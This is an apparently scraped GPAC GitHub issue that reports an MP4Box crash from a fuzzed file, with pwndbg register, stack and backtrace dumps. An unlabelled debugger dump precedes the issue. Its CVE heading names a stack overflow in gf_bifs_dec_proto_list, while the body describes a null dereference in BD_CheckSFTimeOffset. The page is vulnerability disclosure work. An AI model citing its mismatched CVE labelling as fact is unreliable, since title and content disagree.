    02:0010│     0x7fffffff7178 —▸ 0x5555555df250 —▸ 0x5555555d4030 ◂— 0x0
    03:0018│     0x7fffffff7180 —▸ 0x5555555d23b0 ◂— 0x0
    04:0020│     0x7fffffff7188 —▸ 0x5555555df1d0 ◂— 0x0
    05:0028│     0x7fffffff7190 —▸ 0x5555555d42a0 ◂— 0x0
    06:0030│     0x7fffffff7198 —▸ 0x7ffff7914e5e (BM_SceneReplace+110) ◂— mov    rsi,
     rbp
    07:0038│     0x7fffffff71a0 —▸ 0x5555555dea00 —▸ 0x5555555df1f0 —▸ 0x5555555df1a0 ◂— 0x0
    ──────────────────────────────────[ BACKTRACE ]───────────────────────────────────
     ► f 0   0x7ffff7905ce0 gf_bifs_dec_proto_list
       f 1   0x7ffff7906559 BD_DecSceneReplace+73
       f 2   0x7ffff7914e5e BM_SceneReplace+110
       f 3   0x7ffff7915023 BM_ParseCommand+179
       f 4   0x7ffff7915353 gf_bifs_decode_command_list+163
       f 5   0x7ffff7aa1d91 gf_sm_load_run_isom+1217
       f 6   0x5555555844a8 dump_isom_scene+760
       f 7   0x55555557b42c mp4boxMain+9228
    ──────────────────────────────────────────────────────────────────────────────────
    pwndbg> c
    Continuing.
    
    Breakpoint 1, 0x00007ffff7905ce0 in gf_bifs_dec_proto_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ──────────────────────────────────[ REGISTERS ]───────────────────────────────────
    *RAX  0x0
    *RBX  0x5555555df330 ◂— 0x6b6
    *RCX  0x5555555dfdf0 ◂— 0x0
    *RDX  0x0
     RDI  0x5555555de660 ◂— 0xfffffffd
     RSI  0x5555555d23b0 ◂— 0x0
    *R8   0x5555555dfda0 —▸ 0x5555555df330 ◂— 0x6b6
    *R9   0x7c
    *R10  0x7ffff775bf0a ◂— 'gf_sg_proto_get_graph'
    *R11  0x7ffff788b850 (gf_sg_proto_get_graph) ◂— endbr64
    *R12  0x5555555de660 ◂— 0xfffffffd
    *R13  0x5555555d23b0 ◂— 0x0
     R14  0x5555555d42a0 ◂— 0x0
    *R15  0x7fffffff6d40 ◂— 0xb6b6b6b6b6b6b6b6
    *RBP  0x6b6
    *RSP  0x7fffffff6ca8 —▸ 0x7ffff79062d7 (gf_bifs_dec_proto_list+1527) ◂— mov    dword ptr [rsp + 0x14], eax
     RIP  0x7ffff7905ce0 (gf_bifs_dec_proto_list) ◂— endbr64
    ────────────────────────────────────[ DISASM ]────────────────────────────────────
     ► 0x7ffff7905ce0 <gf_bifs_dec_proto_list>       endbr64
       0x7ffff7905ce4 <gf_bifs_dec_proto_list+4>     push   r15
       0x7ffff7905ce6 <gf_bifs_dec_proto_list+6>     push   r14
       0x7ffff7905ce8 <gf_bifs_dec_proto_list+8>     push   r13
       0x7ffff7905cea <gf_bifs_dec_proto_list+10>    mov    r13, rsi
       0x7ffff7905ced <gf_bifs_dec_proto_list+13>    mov    esi, 1
       0x7ffff7905cf2 <gf_bifs_dec_proto_list+18>    push   r12
       0x7ffff7905cf4 <gf_bifs_dec_proto_list+20>    push   rbp
       0x7ffff7905cf5 <gf_bifs_dec_proto_list+21>    push   rbx
       0x7ffff7905cf6 <gf_bifs_dec_proto_list+22>    sub    rsp, 0x488
       0x7ffff7905cfd <gf_bifs_dec_proto_list+29>    mov    rax, qword ptr [rdi + 0x50]
    ────────────────────────────────────[ STACK ]─────────────────────────────────────
    00:0000│ rsp 0x7fffffff6ca8 —▸ 0x7ffff79062d7 (gf_bifs_dec_proto_list+1527) ◂— mov
        dword ptr [rsp + 0x14], eax
    01:0008│     0x7fffffff6cb0 —▸ 0x7ffff775bc80 ◂— 'gf_sg_command_new'
    02:0010│     0x7fffffff6cb8 —▸ 0x5555555df330 ◂— 0x6b6
    03:0018│     0x7fffffff6cc0 ◂— 0xffff6d50
    04:0020│     0x7fffffff6cc8 —▸ 0x5555555de660 ◂— 0xfffffffd
    05:0028│     0x7fffffff6cd0 —▸ 0x5555555df2f0 —▸ 0x5555555dfda0 —▸ 0x5555555df330 ◂— 0x6b6
    06:0030│     0x7fffffff6cd8 —▸ 0x5555555d4030 ◂— 0x0
    07:0038│     0x7fffffff6ce0 ◂— 0x0
    ──────────────────────────────────[ BACKTRACE ]───────────────────────────────────
     ► f 0   0x7ffff7905ce0 gf_bifs_dec_proto_list
       f 1   0x7ffff79062d7 gf_bifs_dec_proto_list+1527
       f 2 0xb6b6b6b6b6b6b6b6
       f 3 0xb6b6b6b6b6b6b6b6
       f 4 0xb6b6b6b6b6b6b6b6
       f 5 0xb6b6b6b6b6b6b6b6
       f 6 0xb6b6b6b6b6b6b6b6
       f 7 0xb6b6b6b6b6b6b6b6
    ──────────────────────────────────────────────────────────────────────────────────
    pwndbg> stack 200
    00:0000│ rsp 0x7fffffff6ca8 —▸ 0x7ffff79062d7 (gf_bifs_dec_proto_list+1527) ◂— mov
        dword ptr [rsp + 0x14], eax
    01:0008│     0x7fffffff6cb0 —▸ 0x7ffff775bc80 ◂— 'gf_sg_command_new'
    02:0010│     0x7fffffff6cb8 —▸ 0x5555555df330 ◂— 0x6b6
    03:0018│     0x7fffffff6cc0 ◂— 0xffff6d50
    04:0020│     0x7fffffff6cc8 —▸ 0x5555555de660 ◂— 0xfffffffd
    05:0028│     0x7fffffff6cd0 —▸ 0x5555555df2f0 —▸ 0x5555555dfda0 —▸ 0x5555555df330 ◂— 0x6b6
    06:0030│     0x7fffffff6cd8 —▸ 0x5555555d4030 ◂— 0x0
    07:0038│     0x7fffffff6ce0 ◂— 0x0
    ... ↓        2 skipped
    0a:0050│     0x7fffffff6cf8 —▸ 0x7ffff7fc7000 —▸ 0x7ffff7743000 ◂— 0x10102464c457f
    0b:0058│     0x7fffffff6d00 —▸ 0x7fffffff6d90 ◂— 0xb6b6b6b6b6b6b6b6
    0c:0060│     0x7fffffff6d08 ◂— 0x0
    0d:0068│     0x7fffffff6d10 —▸ 0x7ffff7fc7000 —▸ 0x7ffff7743000 ◂— 0x10102464c457f
    0e:0070│     0x7fffffff6d18 —▸ 0x7ffff7fc7368 —▸ 0x7ffff7ffe450 —▸ 0x7ffff73131e0 —▸ 0x7ffff7ffe190 ◂— ...
    0f:0078│     0x7fffffff6d20 ◂— 0x0
    10:0080│     0x7fffffff6d28 ◂— 0x0
    11:0088│     0x7fffffff6d30 ◂— 0x1
    12:0090│     0x7fffffff6d38 ◂— 0x7fff00000001
    13:0098│ r15 0x7fffffff6d40 ◂— 0xb6b6b6b6b6b6b6b6
    ... ↓        180 skipped
    pwndbg>

CVE-2021-45258: Stack Overflow in gf_bifs_dec_proto_list() · Issue #1970 · gpac/gpac

A null pointer dereference vulnerability exists in gpac 1.1.0 in the BD_CheckSFTimeOffset function, which causes a segmentation fault and application crash.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

A null pointer dereference was discovered in BD\_CheckSFTimeOffset(). The vulnerability causes a segmentation fault and application crash.

**Version:**

    MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration:
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**command:**

poc\_7.zip

**Result**

    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 796203
    [iso file] Incomplete file while reading for dump - aborting parsing
    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 796203
    [iso file] Incomplete file while reading for dump - aborting parsing
    MPEG-4 BIFS Scene Parsing
    [1]    1900424 segmentation fault  ./MP4Box -lsr ./poc/poc_7
    

**gdb**

    Program received signal SIGSEGV, Segmentation fault.
    __strcasecmp_l_avx () at ../sysdeps/x86_64/multiarch/strcmp-sse42.S:199
    199     ../sysdeps/x86_64/multiarch/strcmp-sse42.S: No such file or directory.
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
     RAX  0x0
     RBX  0x5555555decb0 ◂— 0x0
    *RCX  0x17
    *RDX  0x7ffff77284a0 (_nl_global_locale) —▸ 0x7ffff77246c0 (_nl_C_LC_CTYPE) —▸ 0x7ffff76f4fc6 (_nl_C_name) ◂— 0x636d656d5f5f0043 /* 'C' */
    *RDI  0x0
    *RSI  0x7ffff7dfd2d7 ◂— 'startTime'
     R8   0x0
     R9   0x0
    *R10  0x7ffff775b844 ◂— 'gf_node_get_tag'
    *R11  0x7ffff7849790 (gf_node_get_tag) ◂— endbr64
    *R12  0x0
     R13  0x5555555dfe70 —▸ 0x5555555dfed0 ◂— 0x100000067 /* 'g' */
     R14  0x5555555dff50 ◂— 0x21e8e8512be35500
     R15  0x0
    *RBP  0x7fffffff6740 ◂— 0x200000002
    *RSP  0x7fffffff6688 —▸ 0x7ffff790dc51 (BD_CheckSFTimeOffset+49) ◂— test   eax, eax
    *RIP  0x7ffff76c4089 (__strcasecmp_l_avx+69) ◂— vmovdqu xmm1, xmmword ptr [rdi]
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
       0x7ffff76c4077 <__strcasecmp_l_avx+51>    vmovdqa xmm6, xmmword ptr [rip + 0x378f1]
       0x7ffff76c407f <__strcasecmp_l_avx+59>    cmp    ecx, 0x30
       0x7ffff76c4082 <__strcasecmp_l_avx+62>    ja     __strcasecmp_l_avx+172                <__strcasecmp_l_avx+172>
    
       0x7ffff76c4084 <__strcasecmp_l_avx+64>    cmp    eax, 0x30
       0x7ffff76c4087 <__strcasecmp_l_avx+67>    ja     __strcasecmp_l_avx+172                <__strcasecmp_l_avx+172>
    
     ► 0x7ffff76c4089 <__strcasecmp_l_avx+69>    vmovdqu xmm1, xmmword ptr [rdi]
       0x7ffff76c408d <__strcasecmp_l_avx+73>    vmovdqu xmm2, xmmword ptr [rsi]
       0x7ffff76c4091 <__strcasecmp_l_avx+77>    vpcmpgtb xmm7, xmm1, xmm4
       0x7ffff76c4095 <__strcasecmp_l_avx+81>    vpcmpgtb xmm8, xmm1, xmm5
       0x7ffff76c4099 <__strcasecmp_l_avx+85>    vpcmpgtb xmm9, xmm2, xmm4
       0x7ffff76c409d <__strcasecmp_l_avx+89>    vpcmpgtb xmm10, xmm2, xmm5
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsp 0x7fffffff6688 —▸ 0x7ffff790dc51 (BD_CheckSFTimeOffset+49) ◂— test   eax, eax
    01:0008│     0x7fffffff6690 —▸ 0x5555555decb0 ◂— 0x0
    02:0010│     0x7fffffff6698 —▸ 0x5555555d26d0 ◂— 0x0
    03:0018│     0x7fffffff66a0 —▸ 0x7fffffff6740 ◂— 0x200000002
    04:0020│     0x7fffffff66a8 —▸ 0x7ffff790ed35 (gf_bifs_dec_sf_field+2053) ◂— mov    eax, dword ptr [rbx]
    05:0028│     0x7fffffff66b0 —▸ 0x5555555dfe90 ◂— 0x11cb
    06:0030│     0x7fffffff66b8 ◂— 0x22 /* '"' */
    07:0038│     0x7fffffff66c0 ◂— 0x11cb
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x7ffff76c4089 __strcasecmp_l_avx+69
       f 1   0x7ffff790dc51 BD_CheckSFTimeOffset+49
       f 2   0x7ffff790ed35 gf_bifs_dec_sf_field+2053
       f 3   0x7ffff790f4c0 BD_DecMFFieldVec+656
       f 4   0x7ffff790fa3f gf_bifs_dec_node_mask+287
       f 5   0x7ffff790e158 gf_bifs_dec_node+936
       f 6   0x7ffff79062f8 gf_bifs_dec_proto_list+1560
       f 7   0x7ffff7906559 BD_DecSceneReplace+73
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> bt
    #0  __strcasecmp_l_avx () at ../sysdeps/x86_64/multiarch/strcmp-sse42.S:199
    #1  0x00007ffff790dc51 in BD_CheckSFTimeOffset () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #2  0x00007ffff790ed35 in gf_bifs_dec_sf_field () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #3  0x00007ffff790f4c0 in BD_DecMFFieldVec () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #4  0x00007ffff790fa3f in gf_bifs_dec_node_mask () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #5  0x00007ffff790e158 in gf_bifs_dec_node () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #6  0x00007ffff79062f8 in gf_bifs_dec_proto_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #7  0x00007ffff7906559 in BD_DecSceneReplace () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #8  0x00007ffff7914e5e in BM_SceneReplace () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #9  0x00007ffff7915023 in BM_ParseCommand () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #10 0x00007ffff7915353 in gf_bifs_decode_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #11 0x00007ffff7aa1d91 in gf_sm_load_run_isom () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #12 0x00005555555844a8 in dump_isom_scene ()
    #13 0x000055555557b42c in mp4boxMain ()
    #14 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe188, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe178) at ../csu/libc-start.c:308
    #15 0x000055555556c45e in _start ()
    

`break BD_CheckSFTimeOffset`

    0x00007ffff790dc4c in BD_CheckSFTimeOffset () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
     RAX  0x67
     RBX  0x5555555decb0 ◂— 0x0
     RCX  0x0
     RDX  0x7fffffff6740 ◂— 0x200000002
    *RDI  0x0
     RSI  0x7ffff7dfd2d7 ◂— 'startTime'
     R8   0x0
     R9   0x0
     R10  0x7ffff775b844 ◂— 'gf_node_get_tag'
     R11  0x7ffff7849790 (gf_node_get_tag) ◂— endbr64
     R12  0x0
     R13  0x5555555dfe70 —▸ 0x5555555dfed0 ◂— 0x100000067 /* 'g' */
     R14  0x5555555dff50 ◂— 0x21e8e8512be35500
     R15  0x0
     RBP  0x7fffffff6740 ◂— 0x200000002
     RSP  0x7fffffff6690 —▸ 0x5555555decb0 ◂— 0x0
    *RIP  0x7ffff790dc4c (BD_CheckSFTimeOffset+44) ◂— call   0x7ffff77e0db0
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
       0x7ffff790dc39 <BD_CheckSFTimeOffset+25>    cmp    eax, 1
       0x7ffff790dc3c <BD_CheckSFTimeOffset+28>    je     BD_CheckSFTimeOffset+144                <BD_CheckSFTimeOffset+144>
    
       0x7ffff790dc3e <BD_CheckSFTimeOffset+30>    mov    r12, qword ptr [rbp + 0x10]
       0x7ffff790dc42 <BD_CheckSFTimeOffset+34>    lea    rsi, [rip + 0x4ef68e]
       0x7ffff790dc49 <BD_CheckSFTimeOffset+41>    mov    rdi, r12
     ► 0x7ffff790dc4c <BD_CheckSFTimeOffset+44>    call   strcasecmp@plt                <strcasecmp@plt>
            s1: 0x0
            s2: 0x7ffff7dfd2d7 ◂— 'startTime'
    
       0x7ffff790dc51 <BD_CheckSFTimeOffset+49>    test   eax, eax
       0x7ffff790dc53 <BD_CheckSFTimeOffset+51>    jne    BD_CheckSFTimeOffset+112                <BD_CheckSFTimeOffset+112>
    
       0x7ffff790dc55 <BD_CheckSFTimeOffset+53>    mov    edx, dword ptr [rbx + 0x6c]
       0x7ffff790dc58 <BD_CheckSFTimeOffset+56>    test   edx, edx
       0x7ffff790dc5a <BD_CheckSFTimeOffset+58>    jne    BD_CheckSFTimeOffset+80                <BD_CheckSFTimeOffset+80>
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsp 0x7fffffff6690 —▸ 0x5555555decb0 ◂— 0x0
    01:0008│     0x7fffffff6698 —▸ 0x5555555d26d0 ◂— 0x0
    02:0010│     0x7fffffff66a0 —▸ 0x7fffffff6740 ◂— 0x200000002
    03:0018│     0x7fffffff66a8 —▸ 0x7ffff790ed35 (gf_bifs_dec_sf_field+2053) ◂— mov    eax, dword ptr [rbx]
    04:0020│     0x7fffffff66b0 —▸ 0x5555555dfe90 ◂— 0x11cb
    05:0028│     0x7fffffff66b8 ◂— 0x22 /* '"' */
    06:0030│     0x7fffffff66c0 ◂— 0x11cb
    07:0038│     0x7fffffff66c8 —▸ 0x7fffffff67d0 ◂— 0x2200000002
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x7ffff790dc4c BD_CheckSFTimeOffset+44
       f 1   0x7ffff790ed35 gf_bifs_dec_sf_field+2053
       f 2   0x7ffff790f4c0 BD_DecMFFieldVec+656
       f 3   0x7ffff790fa3f gf_bifs_dec_node_mask+287
       f 4   0x7ffff790e158 gf_bifs_dec_node+936
       f 5   0x7ffff79062f8 gf_bifs_dec_proto_list+1560
       f 6   0x7ffff7906559 BD_DecSceneReplace+73
       f 7   0x7ffff7914e5e BM_SceneReplace+110
    

    Program received signal SIGSEGV, Segmentation fault.
    __strcasecmp_l_avx () at ../sysdeps/x86_64/multiarch/strcmp-sse42.S:199
    199     in ../sysdeps/x86_64/multiarch/strcmp-sse42.S
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
     RAX  0x0
     RBX  0x5555555decb0 ◂— 0x0
     RCX  0x17
     RDX  0x7ffff77284a0 (_nl_global_locale) —▸ 0x7ffff77246c0 (_nl_C_LC_CTYPE) —▸ 0x7ffff76f4fc6 (_nl_C_name) ◂— 0x636d656d5f5f0043 /* 'C' */
     RDI  0x0
     RSI  0x7ffff7dfd2d7 ◂— 'startTime'
     R8   0x0
     R9   0x0
     R10  0x7ffff775b844 ◂— 'gf_node_get_tag'
     R11  0x7ffff7849790 (gf_node_get_tag) ◂— endbr64
     R12  0x0
     R13  0x5555555dfe70 —▸ 0x5555555dfed0 ◂— 0x100000067 /* 'g' */
     R14  0x5555555dff50 ◂— 0x21e8e8512be35500
     R15  0x0
     RBP  0x7fffffff6740 ◂— 0x200000002
     RSP  0x7fffffff6688 —▸ 0x7ffff790dc51 (BD_CheckSFTimeOffset+49) ◂— test   eax, eax
     RIP  0x7ffff76c4089 (__strcasecmp_l_avx+69) ◂— vmovdqu xmm1, xmmword ptr [rdi]
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
       0x7ffff76c4077 <__strcasecmp_l_avx+51>    vmovdqa xmm6, xmmword ptr [rip + 0x378f1]
       0x7ffff76c407f <__strcasecmp_l_avx+59>    cmp    ecx, 0x30
       0x7ffff76c4082 <__strcasecmp_l_avx+62>    ja     __strcasecmp_l_avx+172                <__strcasecmp_l_avx+172>
    
       0x7ffff76c4084 <__strcasecmp_l_avx+64>    cmp    eax, 0x30
       0x7ffff76c4087 <__strcasecmp_l_avx+67>    ja     __strcasecmp_l_avx+172                <__strcasecmp_l_avx+172>
    
     ► 0x7ffff76c4089 <__strcasecmp_l_avx+69>    vmovdqu xmm1, xmmword ptr [rdi]
       0x7ffff76c408d <__strcasecmp_l_avx+73>    vmovdqu xmm2, xmmword ptr [rsi]
       0x7ffff76c4091 <__strcasecmp_l_avx+77>    vpcmpgtb xmm7, xmm1, xmm4
       0x7ffff76c4095 <__strcasecmp_l_avx+81>    vpcmpgtb xmm8, xmm1, xmm5
       0x7ffff76c4099 <__strcasecmp_l_avx+85>    vpcmpgtb xmm9, xmm2, xmm4
       0x7ffff76c409d <__strcasecmp_l_avx+89>    vpcmpgtb xmm10, xmm2, xmm5
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsp 0x7fffffff6688 —▸ 0x7ffff790dc51 (BD_CheckSFTimeOffset+49) ◂— test   eax, eax
    01:0008│     0x7fffffff6690 —▸ 0x5555555decb0 ◂— 0x0
    02:0010│     0x7fffffff6698 —▸ 0x5555555d26d0 ◂— 0x0
    03:0018│     0x7fffffff66a0 —▸ 0x7fffffff6740 ◂— 0x200000002
    04:0020│     0x7fffffff66a8 —▸ 0x7ffff790ed35 (gf_bifs_dec_sf_field+2053) ◂— mov    eax, dword ptr [rbx]
    05:0028│     0x7fffffff66b0 —▸ 0x5555555dfe90 ◂— 0x11cb
    06:0030│     0x7fffffff66b8 ◂— 0x22 /* '"' */
    07:0038│     0x7fffffff66c0 ◂— 0x11cb
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x7ffff76c4089 __strcasecmp_l_avx+69
       f 1   0x7ffff790dc51 BD_CheckSFTimeOffset+49
       f 2   0x7ffff790ed35 gf_bifs_dec_sf_field+2053
       f 3   0x7ffff790f4c0 BD_DecMFFieldVec+656
       f 4   0x7ffff790fa3f gf_bifs_dec_node_mask+287
       f 5   0x7ffff790e158 gf_bifs_dec_node+936
       f 6   0x7ffff79062f8 gf_bifs_dec_proto_list+1560
       f 7   0x7ffff7906559 BD_DecSceneReplace+73

Tag

#ubuntu